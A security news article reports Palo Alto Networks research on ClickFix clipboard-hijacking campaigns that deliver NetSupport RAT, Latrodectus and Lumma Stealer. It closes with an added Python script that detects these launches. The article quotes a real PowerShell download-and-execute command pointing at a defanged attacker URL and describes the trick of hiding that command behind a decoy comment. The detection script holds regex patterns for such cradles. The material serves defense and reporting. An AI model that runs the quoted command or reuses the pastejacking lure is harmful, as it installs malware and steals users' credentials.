Hackers are Using ClickFix Techniques to Deliver NetSupport RAT, Latrodectus and Lumma Stealer Malware

Source: Cybersecurity News (cybersecuritynews.com), by Blog Writer

Emerging in late 2024 and surging throughout the first half of 2025, ClickFix has become a pervasive social-engineering vector in which threat actors trick users into executing malicious commands under the guise of “quick fixes” for common computer issues.

Rather than relying on exploit kits or malicious attachments, attackers employ clipboard hijacking—injecting obfuscated commands into the victim’s clipboard—and instruct the victim to paste and run those commands via Windows shell shortcuts such as Win+R or Win+X.

The simplicity of this tactic allows adversaries to bypass many standard prevention controls and quietly deploy a range of malware families on compromised endpoints.

Palo Alto Networks analysts have identified three prominent campaigns leveraging ClickFix in recent months.

In one campaign, NetSupport RAT is distributed through loader domains masquerading as legitimate services such as DocuSign and Okta.

A carefully crafted landing page instructs victims to open the Run dialog (Win+R) and paste an injected PowerShell command, which subsequently downloads a ZIP archive containing a malicious DLL loader.

This DLL sideloads itself via a legitimate Java executable (jp2launcher.exe), retrieves encrypted payloads (data_3.bin and data_4.bin) using curl.exe, and ultimately launches NetSupport RAT’s client32.exe in memory.

Weekly infection instances since the beginning of 2025 (Source – Palo Alto Networks)

In another series of attacks, threat actors deploying Latrodectus combine ClickFix lures with ClearFake infrastructure. Victims visiting compromised websites are redirected to fake verification pages that inject an encoded PowerShell command into the clipboard.

When executed, the command uses curl.exe to fetch a JavaScript downloader that retrieves an MSI installer, which sideloads Latrodectus as a malicious DLL (libcef.dll) within a legitimate process.

Distribution of industries affected by ClickFix lures (Source – Palo Alto Networks)

The final DLL injects shellcode to harvest browser credentials and exfiltrate data to a remote server.

A third wave of intrusions routes victims through typosquatted IP-logging domains to deliver Lumma Stealer.

As Palo Alto Networks researchers noted, each victim receives a unique MSHTA command that downloads a heavily obfuscated, Base64-encoded PowerShell script.

This script drops and executes an AutoIt-based loader (PartyContinued.exe), which unpacks a CAB archive (Boat.pst) and constructs an AutoIt3 engine binary (Slovenia.com) to launch the Lumma payload.

Fake landing page for DocuSign at docusign.sa[.]com (Source – Palo Alto Networks)

The loader then executes a series of command-line operations (cmd /c md, copy /b, choice) to extract, assemble, and run the stealer without further user interaction.

Infection Mechanism via Clipboard Hijacking

At the heart of the ClickFix vector is pastejacking: JavaScript on a malicious webpage overwrites the user’s clipboard with an obfuscated command string and displays innocuous instructions to “verify” or “fix” an issue.

The NetSupport RAT infection chain (Source – Palo Alto Networks)

Upon pasting into the Run dialog or terminal, the victim unwittingly executes a script that downloads and stages additional components.

For example, the injected PowerShell string used in the NetSupport RAT campaign appears as:

powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "iex(New-Object Net.WebClient).DownloadString('hxxps://diab.live/up/loader.ps1')"

The string is fully hidden from the user’s view by appending benign-looking comments, such as “Cloud Identificator: 2031,” at the end of the script.

Fake landing page for Okta at oktacheck.it[.]com (Source – Palo Alto Networks)

Once executed, the script reaches out to the attacker’s C2, retrieves the next-stage loader, and initiates the multi-stage infection chain.

This clipboard-based delivery mechanism effectively circumvents most email- and network-centric defenses, placing greater emphasis on endpoint behavioral monitoring and registry artifact analysis.
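As an added illustration of the endpoint behavioral monitoring the paragraph above calls for (example code written for this article, not tooling from Palo Alto Networks or the report), the script below scores constructed process-creation events for the ClickFix shape described on this page: an interpreter such as powershell.exe or mshta.exe spawned from the Run dialog (parent explorer.exe), a download-and-execute cradle or policy bypass on the command line, and a trailing decoy comment of the “Cloud Identificator: 2031” kind. The event records and the example.invalid URLs are made up for the demonstration.

```python
import re
# Constructed sample process-creation events (made-up telemetry, not data from the report).
SAMPLE_EVENTS = [
    {  # ClickFix shape: Run dialog (parent explorer.exe) -> PowerShell download cradle + decoy comment
        "parent": "explorer.exe", "image": "powershell.exe",
        "cmdline": "powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "
                   "\"iex(New-Object Net.WebClient).DownloadString('https://loader.example.invalid/up/loader.ps1')\" "
                   "# Cloud Identificator: 2031",
    },
    {  # Lumma-style shape: mshta.exe launched from the Run dialog with a remote URL
        "parent": "explorer.exe", "image": "mshta.exe",
        "cmdline": "mshta https://verify.example.invalid/check.hta",
    },
    {  # Benign: local admin script run from a console, no remote fetch
        "parent": "cmd.exe", "image": "powershell.exe",
        "cmdline": "powershell.exe -File C:\\scripts\\inventory.ps1",
    },
]

INTERACTIVE_PARENTS = {"explorer.exe"}  # Win+R and Win+X launch their children under explorer.exe
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}
REMOTE_FETCH = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl(\.exe)?\s|https?://", re.I)
EXEC_CRADLE = re.compile(r"\biex\b|invoke-expression|-enc(odedcommand)?\b|executionpolicy\s+bypass", re.I)
DECOY_COMMENT = re.compile(r"\s#\s*[A-Za-z][\w ]+:\s*\d+\s*$")  # trailing "# Cloud Identificator: 2031"-style text
INTERACTIVE = "interpreter launched from Run dialog or shell shortcut"

def classify(event):
    """Return the ClickFix indicators matched by one process-creation event."""
    reasons = []
    if event["parent"].lower() in INTERACTIVE_PARENTS and event["image"].lower() in INTERPRETERS:
        reasons.append(INTERACTIVE)
    cmd = event["cmdline"]
    if REMOTE_FETCH.search(cmd):
        reasons.append("command line fetches remote content")
    if EXEC_CRADLE.search(cmd):
        reasons.append("download-and-execute cradle or policy bypass")
    if DECOY_COMMENT.search(cmd):
        reasons.append("trailing decoy comment pushes the real command out of view")
    return reasons

def is_clickfix(event):
    """Alert only when an interactive launch is paired with at least one other indicator."""
    reasons = classify(event)
    return INTERACTIVE in reasons and len(reasons) >= 2

def detect(events):
    """Indices and matched indicators of the events that look like ClickFix execution."""
    return [(i, classify(e)) for i, e in enumerate(events) if is_clickfix(e)]
if __name__ == "__main__":
    for idx, reasons in detect(SAMPLE_EVENTS):
        print(f"event {idx}: " + "; ".join(reasons))
```

Requiring the interactive-parent indicator plus at least one more keeps ordinary console scripting out of the alert, while the decoy-comment rule catches the padding trick even when the cradle itself is obfuscated differently.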
